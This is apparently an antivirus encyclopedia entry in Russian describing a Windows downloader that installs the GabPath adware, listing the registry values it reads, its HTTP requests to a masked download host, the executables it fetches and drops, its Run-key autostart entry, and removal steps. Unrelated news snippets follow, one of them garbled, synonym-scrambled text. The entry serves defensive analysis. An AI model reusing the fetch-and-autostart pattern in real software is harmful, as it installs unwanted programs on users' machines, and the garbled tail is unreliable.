Технические детали

Программа, которая загружает из сети Интернет другие компоненты. Является приложением Windows (PE-EXE файл). Имеет размер 492640 байт. Написана на C++.

Деструктивная активность

После запуска приложение определяет текущие настройки "Проводника", считывая значения параметров:

NoRun
NoDrives
RestrictRun
NoNetConnectDisconnect
NoRecentDocsHistory
NoClose

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

POST /upd.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: GPInstaller2
Host: client***workgp.com
Content-Length: 134
Cache-Control: no-cache
wtdat=54a78096958b9a7276003725b16a30ac793f86621799ee835
2ec5efa1c5fdcef95358852675ff664bd6a9e9a8e985d2f5cfaee833b
5669ef35d32079a7975ea7

http://clien***tworkgp.com/./data/configs_micro_by_network
/1306/INSTALLS/sacc.cfg

%Documents and Settings%\%Current User%\Application Data\
GabPath\config.cfg

Также осуществляет HTTP запросы:

POST /upd.php HTTP/1.1..
Content-Type: application/x-www-form-urlencoded..
User-Agent: GPInstaller2..
Host: client***workgp.com..
Content-Length: 102..
Cache-Control: no-cache....
wtdat=b8e7d3cb092cf00d94e863fc3d68dc195aae38b57
baf0f9f7a339a2346ccbcce34213ac17fead19bd61540dcadf90512

GET /./data/gp/exe/GabPath.prod.v111400.30Apr2011.exe.d3a48
cddf679929df9b9330358168684 HTTP/1.1..
User-Agent: GPInstaller2..
Host: clients.networkgp.com....

http://client***workgp.com/./data/gp/exe/GabPath.prod.v<версия_файла>.
<дата_загрузки>.exe.<хеш_файла>
http://client***path.com/./data/gabpath/uninstaller/GPUninstaller.prod.v
<версия_файла>.<дата_загрузки>.exe.<хеш_файла>

%Documents and Settings%\%Current User%\Application
 Data\GabPath\GPUninstall.exe – имеет размер 270336 байт.
%Documents and Settings%\%Current User%\Application
 Data\GabPath\gabpath.exe – данный файл имеет размер 488884 байт 
и детектируется антивирусом Касперского как 
not-a-virus:AdWare.Win32.Gaba.heur.

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"GabPath"="%Documents and Settings%\%Current User%\
Application Data\GabPath\gabpath.exe"

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

1. Удалить параметр ключа системного реестра:

   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "GabPath"="%Documents and Settings%\%Current User%\
   Application Data\GabPath\gabpath.exe"
   

2. Удалить файлы:

   %Documents and Settings%\%Current User%\Application Data\
   GabPath\config.cfg
   %Documents and Settings%\%Current User%\Application Data\
   GabPath\gabpath.exe
   %Documents and Settings%\%Current User%\Application Data\
   GabPath\GPUninstall.exe
   

   Произвести полную проверку компьютера Антивирусом Касперского с обновленными антивирусными базами (скачать пробную версию).

23 апреля 2024 года

Обращаем внимательность на дальнейшее обновление пасмурной версии песочницы Dr.Web vxCube, в взаимоотношения с чем 24 апреля с 13:00 перед началом 14:00 по столичному времени обслуживание будет недоступен для использования.

В составе песочницы будет обновлена документация — описание работы обслуживания будет снова на... Антивирус Dr.Web

Бизнес-школа «БИЗНЕС ИНСАЙТ» и проект «ЭКСПЕРТЫ» приглашают на III Всероссийский онлайн-форум «БИЗНЕС. ВЕСНА 2024». Бизнес-форум — важнейшее событие в мире бизнеса. На одной площадке соберутся действующие предприниматели, эксперты-практики, чтобы поделиться […]

The post 25-26.05.24г. 10.00-15.00. III Всероссийский форум «БИЗН... Новости Безопастности

17 апреля 2024 года